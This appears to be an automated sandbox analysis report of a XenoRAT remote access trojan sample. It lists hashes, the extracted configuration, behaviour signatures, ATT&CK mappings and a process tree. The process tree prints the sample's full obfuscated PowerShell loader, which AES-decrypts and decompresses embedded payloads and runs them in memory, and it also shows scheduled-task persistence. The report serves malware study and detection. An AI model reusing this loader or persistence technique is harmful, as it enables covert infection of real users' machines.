xenorat | c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a

General

Target

sdsd.bat
Size

399KB
MD5

dedc70c320233bc67ceb02a9492f29d6
SHA1

d031a05a302501a50581a2338762013f60da62df
SHA256

c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
SHA512

776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
SSDEEP

6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG

Score

10^/10

xenorat execution rat trojan

Malware Config

Extracted

Family

xenorat

C2

127.0.0.1

Attributes

delay
5000
install_path
temp
port
7788
startup_name
lol

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2032 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

sdsd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation sdsd.exe
Executes dropped EXE 2 IoCs

Processes:

sdsd.exesdsd.exe

pid process

1668 sdsd.exe
4796 sdsd.exe
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\System32\Tasks\lol svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

404 schtasks.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	sdsd.exe

pid	process
1668	sdsd.exe
4796	sdsd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\lol	svchost.exe

pid	process
404	schtasks.exe

Modifies registry class 7 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133627046440725541"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133627046519666538"	svchost.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

Processes:

powershell.exe

pid	process
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeExplorer.EXEsvchost.exe

description	pid	process
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeShutdownPrivilege	3428	Explorer.EXE
Token: SeCreatePagefilePrivilege	3428	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2580	svchost.exe
Token: SeIncreaseQuotaPrivilege	2580	svchost.exe
Token: SeSecurityPrivilege	2580	svchost.exe
Token: SeTakeOwnershipPrivilege	2580	svchost.exe
Token: SeLoadDriverPrivilege	2580	svchost.exe
Token: SeSystemtimePrivilege	2580	svchost.exe
Token: SeBackupPrivilege	2580	svchost.exe
Token: SeRestorePrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	2580	svchost.exe
Token: SeSystemEnvironmentPrivilege	2580	svchost.exe
Token: SeUndockPrivilege	2580	svchost.exe
Token: SeManageVolumePrivilege	2580	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2580	svchost.exe
Token: SeIncreaseQuotaPrivilege	2580	svchost.exe
Token: SeSecurityPrivilege	2580	svchost.exe
Token: SeTakeOwnershipPrivilege	2580	svchost.exe
Token: SeLoadDriverPrivilege	2580	svchost.exe
Token: SeSystemtimePrivilege	2580	svchost.exe
Token: SeBackupPrivilege	2580	svchost.exe
Token: SeRestorePrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	2580	svchost.exe
Token: SeSystemEnvironmentPrivilege	2580	svchost.exe
Token: SeUndockPrivilege	2580	svchost.exe
Token: SeManageVolumePrivilege	2580	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2580	svchost.exe
Token: SeIncreaseQuotaPrivilege	2580	svchost.exe
Token: SeSecurityPrivilege	2580	svchost.exe
Token: SeTakeOwnershipPrivilege	2580	svchost.exe
Token: SeLoadDriverPrivilege	2580	svchost.exe
Token: SeSystemtimePrivilege	2580	svchost.exe
Token: SeBackupPrivilege	2580	svchost.exe
Token: SeRestorePrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	2580	svchost.exe
Token: SeSystemEnvironmentPrivilege	2580	svchost.exe
Token: SeUndockPrivilege	2580	svchost.exe
Token: SeManageVolumePrivilege	2580	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2580	svchost.exe
Token: SeIncreaseQuotaPrivilege	2580	svchost.exe
Token: SeSecurityPrivilege	2580	svchost.exe
Token: SeTakeOwnershipPrivilege	2580	svchost.exe
Token: SeLoadDriverPrivilege	2580	svchost.exe
Token: SeSystemtimePrivilege	2580	svchost.exe
Token: SeBackupPrivilege	2580	svchost.exe
Token: SeRestorePrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	2580	svchost.exe
Token: SeSystemEnvironmentPrivilege	2580	svchost.exe
Token: SeUndockPrivilege	2580	svchost.exe
Token: SeManageVolumePrivilege	2580	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2580	svchost.exe
Token: SeIncreaseQuotaPrivilege	2580	svchost.exe
Token: SeSecurityPrivilege	2580	svchost.exe
Token: SeTakeOwnershipPrivilege	2580	svchost.exe
Token: SeLoadDriverPrivilege	2580	svchost.exe
Token: SeSystemtimePrivilege	2580	svchost.exe
Token: SeBackupPrivilege	2580	svchost.exe
Token: SeRestorePrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	2580	svchost.exe
Token: SeSystemEnvironmentPrivilege	2580	svchost.exe
Token: SeUndockPrivilege	2580	svchost.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

cmd.exepowershell.exesdsd.exesdsd.exesvchost.exe

description	pid	process	target process
PID 1048 wrote to memory of 5040	1048	cmd.exe	cmd.exe
PID 1048 wrote to memory of 5040	1048	cmd.exe	cmd.exe
PID 1048 wrote to memory of 2032	1048	cmd.exe	powershell.exe
PID 1048 wrote to memory of 2032	1048	cmd.exe	powershell.exe
PID 2032 wrote to memory of 3428	2032	powershell.exe	Explorer.EXE
PID 2032 wrote to memory of 1120	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2556	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 968	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 4512	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 964	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2300	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1736	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2320	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1460	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 3300	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1920	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1520	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1604	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1908	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 916	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1704	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1304	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1696	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1096	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 4440	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2068	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 3840	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1076	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1468	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 3036	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1848	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 948	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1644	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1840	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2428	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 408	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 60	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 3604	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1828	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1232	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2608	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1620	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1220	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 792	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 4948	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 4372	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2188	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2580	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2772	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1392	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2112	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 2564	2032	powershell.exe	svchost.exe
PID 2032 wrote to memory of 1668	2032	powershell.exe	sdsd.exe
PID 2032 wrote to memory of 1668	2032	powershell.exe	sdsd.exe
PID 2032 wrote to memory of 1668	2032	powershell.exe	sdsd.exe
PID 1668 wrote to memory of 4796	1668	sdsd.exe	sdsd.exe
PID 1668 wrote to memory of 4796	1668	sdsd.exe	sdsd.exe
PID 1668 wrote to memory of 4796	1668	sdsd.exe	sdsd.exe
PID 4796 wrote to memory of 404	4796	sdsd.exe	schtasks.exe
PID 4796 wrote to memory of 404	4796	sdsd.exe	schtasks.exe
PID 4796 wrote to memory of 404	4796	sdsd.exe	schtasks.exe
PID 792 wrote to memory of 448	792	svchost.exe	wmiprvse.exe
PID 792 wrote to memory of 448	792	svchost.exe	wmiprvse.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
2⤵
PID:448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:916

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:968

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:60

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1736

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1908

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:1696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3300

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:1048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Users\Admin\AppData\Local\Temp\sdsd.exe
"C:\Users\Admin\AppData\Local\Temp\sdsd.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1668

C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe
"C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /Create /TN "lol" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp" /F
6⤵
- Creates scheduled task(s)
PID:404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3884,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:8
1⤵
PID:4764

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sdsd.exe.log
Filesize
226B

MD5
916851e072fbabc4796d8916c5131092

SHA1
d48a602229a690c512d5fdaf4c8d77547a88e7a2

SHA256
7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

SHA512
07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nttybbfr.51g.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\sdsd.exe
Filesize
45KB

MD5
41146957ad1a37a26565c42ac174609a

SHA1
622b3cd22edd11ba59ec438e14fe96d0c03d5026

SHA256
320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc

SHA512
d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp
Filesize
1KB

MD5
9ec91e3fb824c95fd8118ef24669988a

SHA1
5b6fe95c2a51b7ef0970c3b24844ece400e677ea

SHA256
45d3489cde25df745a4f071d83d83fc6d9daddc03b3a680a5c3010e844ae38f5

SHA512
b898e3d16d77d672b7f5d2c32ff2a5fbc6f71d1be5ed12c2981cabd4ef90315b36512335a15d2c3cbe0bb24539b6ccd37ea1771521f9487f2d915c148fc02fc2

Download Submit
memory/60-76-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/948-68-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1120-70-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1232-77-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1460-73-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1520-74-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1644-83-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1668-126-0x0000000000140000-0x0000000000152000-memory.dmp

Filesize
72KB

Download
memory/1704-80-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/1736-72-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/2032-14-0x00000208B2AA0000-0x00000208B2B16000-memory.dmp

Filesize
472KB

Download
memory/2032-142-0x00007FFD5EE93000-0x00007FFD5EE94000-memory.dmp

Filesize
4KB

Download
memory/2032-0-0x00007FFD53903000-0x00007FFD53905000-memory.dmp

Filesize
8KB

Download
memory/2032-143-0x00007FFD53900000-0x00007FFD543C1000-memory.dmp

Filesize
10.8MB

Download
memory/2032-19-0x00000208B29A0000-0x00000208B29B2000-memory.dmp

Filesize
72KB

Download
memory/2032-15-0x00000208983D0000-0x00000208983D8000-memory.dmp

Filesize
32KB

Download
memory/2032-13-0x00000208B29D0000-0x00000208B2A14000-memory.dmp

Filesize
272KB

Download
memory/2032-16-0x00000208B2A20000-0x00000208B2A74000-memory.dmp

Filesize
336KB

Download
memory/2032-12-0x00007FFD53900000-0x00007FFD543C1000-memory.dmp

Filesize
10.8MB

Download
memory/2032-11-0x00007FFD53900000-0x00007FFD543C1000-memory.dmp

Filesize
10.8MB

Download
memory/2032-10-0x0000020898460000-0x0000020898482000-memory.dmp

Filesize
136KB

Download
memory/2068-81-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/2428-82-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/2556-79-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/3428-69-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/3428-20-0x0000000002CF0000-0x0000000002D1A000-memory.dmp

Filesize
168KB

Download
memory/3604-78-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/4440-75-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download
memory/4512-71-0x00007FFD326F0000-0x00007FFD32700000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads